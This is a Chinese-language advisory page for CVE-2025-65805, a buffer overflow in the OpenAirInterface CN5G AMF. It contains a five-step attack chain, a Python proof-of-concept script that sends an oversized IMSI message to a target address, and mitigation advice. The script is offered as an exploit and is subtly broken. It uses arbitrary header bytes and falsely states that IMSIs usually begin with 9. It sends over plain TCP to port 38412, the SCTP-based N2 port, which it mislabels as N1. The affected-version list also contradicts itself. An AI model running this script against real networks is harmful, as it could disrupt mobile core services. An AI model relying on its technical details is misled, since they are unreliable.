CVE-2025-65805 OpenAirInterface CN5G AMF缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-65805

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenAirInterface CN5G AMF <= v2.1.9

漏洞概述

OpenAirInterface CN5G AMF在处理NAS消息时存在严重的缓冲区溢出漏洞。攻击者可以通过访问N1端口，发送超过1000字符的畸形imsi字符串来触发此漏洞。该漏洞允许未经授权的远程攻击者发起拒绝服务(DoS)攻击，并可能实现恶意代码执行。作为5G核心网的关键组件，AMF(Access and Mobility Management Function)负责处理移动性和接入管理，其安全性至关重要。此漏洞影响OpenAirInterface 5G核心网部署，可能导致整个5G网络服务中断或被攻击者完全控制。CVSS评分7.5，属于高危漏洞，无需认证即可远程利用，对可用性造成严重影响。

技术细节

漏洞根源在于OpenAirInterface CN5G AMF在解析和处理NAS(Non-Access Stratum)消息中的imsi(International Mobile Subscriber Identity)字段时，未对输入长度进行充分验证。当AMF接收到包含超过1000字符的imsi字符串时，固定大小的缓冲区无法容纳该数据，导致缓冲区溢出。攻击者可通过N1接口发送精心构造的NAS消息，利用此漏洞覆盖相邻内存区域。在特定条件下，攻击者可能通过覆盖返回地址或函数指针来实现代码执行。漏洞影响AMF的nas_5g_decode_message或类似处理函数，攻击者无需任何认证即可远程触发。此漏洞是典型的输入验证不足导致的缓冲区溢出，属于CWE-120或CWE-122类别。

攻击链分析

STEP 1

信息收集

攻击者识别目标OpenAirInterface 5G核心网部署，确定AMF组件及N1接口暴露情况

STEP 2

构造恶意NAS消息

攻击者构造包含超长imsi字段(>1000字符)的畸形NAS消息，用于触发缓冲区溢出

STEP 3

发送攻击载荷

通过N1接口向AMF发送恶意NAS消息，无需任何认证即可触发漏洞

STEP 4

触发缓冲区溢出

AMF在处理超长imsi字符串时，固定大小缓冲区无法容纳，导致内存越界写入

STEP 5

DoS或代码执行

攻击成功导致AMF服务崩溃(DoS)，或通过覆盖关键内存区域实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-65805 PoC - OpenAirInterface CN5G AMF Buffer Overflow
Note: This PoC is for educational and authorized security testing only.
"""

import socket
import struct
import sys

def create_nas_message_with_long_imsi(imsi_length=1500):
    """Construct a NAS message with oversized IMSI field"""
    # NAS message header
    nas_header = bytes([0x00, 0x01, 0x02, 0x03])
    
    # IMSI field with excessive length (triggering overflow)
    long_imsi = b'9' * imsi_length  # IMSI typically starts with digit 9
    
    # Construct the malformed NAS message
    nas_message = nas_header + long_imsi
    
    return nas_message

def exploit_amf_buffer_overflow(target_ip, target_port=38412):
    """
    Send malicious NAS message to AMF N1 interface
    
    Args:
        target_ip: AMF server IP address
        target_port: N1 interface port (default 38412)
    """
    try:
        print(f"[*] Connecting to AMF at {target_ip}:{target_port}")
        
        # Create malicious payload
        payload = create_nas_message_with_long_imsi(1500)
        
        print(f"[*] Sending malicious NAS message ({len(payload)} bytes)")
        print(f"[*] IMSI field length: 1500 bytes (exceeds 1000 byte limit)")
        
        # Establish connection and send payload
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        sock.send(payload)
        
        print("[+] Payload sent successfully")
        print("[!] Target may be crashed or code execution achieved")
        
        sock.close()
        return True
        
    except socket.timeout:
        print("[-] Connection timeout - target may be vulnerable and blocking")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 38412
    
    exploit_amf_buffer_overflow(target, port)

影响范围

OpenAirInterface CN5G AMF < v2.1.9

OpenAirInterface CN5G AMF <= v2.1.9

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)通过网络分段隔离5G核心网组件，限制N1接口暴露；2)部署IPS/IDS监控异常的NAS消息特征；3)实施严格的访问控制策略，限制对AMF管理接口的访问；4)考虑在AMF前部署负载均衡器实现流量过滤；5)监控AMF进程状态，设置异常自动告警和重启机制。